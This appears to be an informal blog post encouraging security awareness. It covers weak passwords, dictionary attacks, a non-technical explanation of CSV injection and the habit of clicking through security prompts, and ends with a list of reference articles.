Have you ever leaned back in your chair and thought to yourself, “Wow, how in the world has my private information NOT been stolen?” Probably not. Or, if you are more like me, you quickly respond with a thought like, “Ah well. I’m probably fine,” and go about your day. This mindset, however, is proving to be EXTREMELY costly to many companies. As in, if all of the money stolen in cyber security attacks was put toward the American national debt, it would be paid off in less than a decade. Just last year, companies lost around $3,000,000,000,000 to cyber security attacks. That is a lot.
So, if you, like me, are thinking that you would rather not be responsible for the loss of 107,142.86* company dollars, then I have some good news. By just being a bit more careful and a bit more intentional about security, you can protect yourself (and your company) from a surprisingly large number of attacks. I will not go into all of the details, I will leave that to the experts in the articles below, but I can at least give you some pointers to get you started (and hopefully also motivated to keep learning).
First thing’s first. Passwords. If you see your password in this sentence, then you might as well not have a password (and 123456 is just as bad). One of the more common hacking techniques is called a “dictionary attack”. Essentially, it uses a large dictionary (or multiple dictionaries) of common passwords (or password components) and tries different combinations until one of them works. What does this have to do with having “password” as a password? Well, because password was the 8th most common password as of 2016 according to the strong password article below, it is almost guaranteed to be one of the first entries in a hacker’s dictionary. So even if there are measures in place to prevent a dictionary attack (such as the infamous “Sorry, too many attempts, please try again later,”) using password as your password negates the security measures almost entirely. It is like locking the door and leaving the window open. With that in mind, if you want to learn more about making good passwords (or even just decent passwords) I have included an article about that below, and you can find lots of information with a simple web search.
Now on to the security risk that sparked this article. This is called a CSV injection. I will leave the details of CSV injection to the George Mauer article below, as he does a fantastic job explaining it. But in short, a CSV attack is when someone uses some innocent-seeming exported spreadsheet to literally steal all of the information from every spreadsheet in the company. Yes. I am serious. In case you have not used CSV files before, a CSV file is one of the most basic forms of a spreadsheet from a program like Microsoft Excel or Google Sheets. Again, I will leave the details to George Mauer, but there is one thing that he mentioned passingly in his article that I think is important to remember if we are trying to be more intentional about cyber security. And this is something that may seem obvious, but perhaps because of its obviousness it tends to fly beneath the radar. Don’t mindlessly click the prompt. When you are opening a CSV file and a little box pops up that says “Do you want to open this file? Only click yes if you trust the source of this workbook,” do not just click yes without thinking, especially if you are an administrator with high-level permissions. I think that because we see tons of this type of prompt from day to day we tend to grow accustomed to them, and we are conditioned by the sheer number of prompts to just click “yes” or “I accept the terms” to get it over with. This is an issue in itself and may warrant a future article, but the point is: mindlessly clicking “yes” or “accept” can mean TREMENDOUS losses to your company, or to yourself.
By keeping these things in mind and just being a little bit more intentional and aware of computer security, we can go a long way toward protecting our finances and sensitive data from those who would steal it. So many security breaches happen simply because people are either uninformed or uninspired regarding computer security. If you, dear reader, fall into the first category, then I hope that this article has been enlightening, and I hope that you are encouraged to learn more about keeping your data (and your company’s data) safe. If you are in the second category, as I was for a long time, then I encourage you to take small steps to increase your security. A large percentage of hacker attacks could be prevented if potential victims are just a little bit more aware, a little bit more intentional about keeping your data safe.
* $107,142.86 is the approximate total of money lost to cyber attacks in 2016 divided by the approximate number of businesses in the US, which was found with a quick Google search. So essentially an approximate average of dollars lost per company due to cyber attacks.
CSV Injection: http://georgemauer.net/2017/10/07/csv-injection.html
Some other security risks: https://heimdalsecurity.com/blog/10-critical-corporate-cyber-security-risks-a-data-driven-list/
Some statistics: https://www.csoonline.com/article/3153707/security/top-5-cybersecurity-facts-figures-and-statistics-for-2017.html
Lots of statistics: https://itspmagazine.com/from-the-newsroom/keep-calm-and-here-is-a-list-of-alarming-cybersecurity-statistics
Common password acquisition techniques: https://fossbytes.com/hacking-techniques/
Great article on Dictionary Attacks: https://www.schneier.com/blog/archives/2013/06/a_really_good_a.html
Article about weak passwords: http://www.dailymail.co.uk/sciencetech/article-4125128/The-common-passwords-used-2016.html
In case you are wondering why “3rjs1la7qe” is on the list of popular passwords: https://www.tripwire.com/state-of-security/featured/so-just-why-is-18atcskd2w-such-a-popular-password/
Article about strong passwords: https://www.howtogeek.com/195430/how-to-create-a-strong-password-and-remember-it/
Article about most common cybersecurity breaches: http://resources.infosecinstitute.com/the-top-five-cyber-security-vulnerabilities-in-terms-of-potential-for-catastrophic-damage/#gref